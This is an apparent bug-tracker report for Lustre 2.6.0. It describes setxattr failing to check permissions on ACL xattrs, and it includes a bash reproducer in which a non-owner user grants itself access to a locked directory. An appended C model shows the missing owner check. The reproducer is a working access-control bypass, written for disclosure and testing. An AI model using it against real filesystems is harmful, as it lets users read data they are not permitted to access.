Details
- Bug
- Resolution: Duplicate
- Blocker
- Lustre 2.6.0
- 3
- 12939
Description
Setxattr does not check the permission when setting ACL xattrs. This
will cause a security problem because any user can work around permission
checking by changing ACL rules.
The following script will reproduce this problem.
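#!/bin/bash
# Test directory on the Lustre mount
DIR=/mnt/lustre/dir
# we can get this from Lustre/test
RUNAS=./runas

# Start from a clean state: the directory must not exist yet
rmdir "$DIR" 2>/dev/null
if [ -e "$DIR" ]; then
    echo "Please remove $DIR"
    exit 1
fi

# Create the directory and make it accessible to its owner only
mkdir "$DIR"
if [ ! -d "$DIR" ]; then
    echo "Failed to mkdir $DIR"
    exit 1
fi
chmod 700 "$DIR"

# Sanity check: user "test" must not be able to list the directory
"$RUNAS" -u test ls "$DIR"
if [ $? -eq 0 ]; then
    echo "Permission error"
    exit 1
fi

# User "test" is not the owner, so this setfacl should be rejected
"$RUNAS" -u test setfacl -m u:test:rwx "$DIR"
if [ $? -ne 0 ]; then
    echo "Problem not reproduced because setfacl failed"
    exit 1
fi
echo "Problem reproduced!!"

# Confirm that the ACL set by "test" now grants access
"$RUNAS" -u test ls "$DIR"
if [ $? -ne 0 ]; then
    echo "ACL does not work!"
    exit 1
fi
echo "Security problem!!"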
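
The check the description says is missing, as an added example that is not Lustre code and not part of the original report: a userspace model of a setxattr handler without and with the rule Linux applies to POSIX ACLs (the caller must own the inode or hold CAP_FOWNER). The struct and function names are hypothetical; only the two xattr names are the real Linux ones.

```c
#include <errno.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>

/* Simplified stand-ins for kernel state (hypothetical, not Lustre types). */
struct model_inode { uid_t owner; };
struct model_cred  { uid_t fsuid; bool cap_fowner; };

/* The two xattr names Linux uses to carry POSIX ACLs. */
static bool is_acl_xattr(const char *name)
{
    return strcmp(name, "system.posix_acl_access") == 0 ||
           strcmp(name, "system.posix_acl_default") == 0;
}

/* Behaviour described in the report: the ACL is accepted with no check. */
static int setxattr_unchecked(const struct model_inode *ino,
                              const struct model_cred *cred, const char *name)
{
    (void)ino; (void)cred; (void)name;
    return 0;
}

/* Expected behaviour: only the owner or a CAP_FOWNER holder may set an ACL.
 * Other xattr namespaces have their own rules, which are not modelled here. */
static int setxattr_checked(const struct model_inode *ino,
                            const struct model_cred *cred, const char *name)
{
    if (is_acl_xattr(name) &&
        cred->fsuid != ino->owner && !cred->cap_fowner)
        return -EPERM;
    return 0;
}

int main(void)
{
    /* Constructed sample: directory owned by uid 0, caller is uid 1000. */
    struct model_inode dir = { .owner = 0 };
    struct model_cred test_user = { .fsuid = 1000, .cap_fowner = false };
    const char *acl = "system.posix_acl_access";

    printf("unchecked: %d\n", setxattr_unchecked(&dir, &test_user, acl));
    printf("checked:   %d\n", setxattr_checked(&dir, &test_user, acl));
    return 0;
}
```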